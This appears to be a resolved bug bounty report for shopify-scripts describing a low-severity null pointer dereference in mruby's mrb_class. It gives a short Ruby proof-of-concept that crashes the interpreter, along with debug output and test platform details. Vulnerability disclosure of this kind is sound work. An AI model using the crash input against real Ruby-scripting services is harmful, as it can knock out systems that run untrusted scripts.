Null pointer dereference in mrb_class
Low
shopify-scripts
Reported by
dgaletic
Vulnerability Details
Technical details and impact analysis
PoC
===
The following demonstrates a crash:
```ruby
if def class
A
ensure
e rescue 0
end
end
[].map.a
```
Debug info
==========
The crash happens due to a null pointer dereference in `mrb_class`, class.h:50.
```
50├> return mrb_obj_ptr(v)->c;
```
Valgrind shows several reads inside free'd blocks.
Test platform
=============
* Linux Mint 17.3 (Cinnamon 64-bit), built with gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.3)
* mruby SHA: 051e40c0493f2de332f5439e3230c9fe6958bf1a
Thank you,
Dinko Galetic
Denis Kasak
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$800.00
Weakness
NULL Pointer Dereference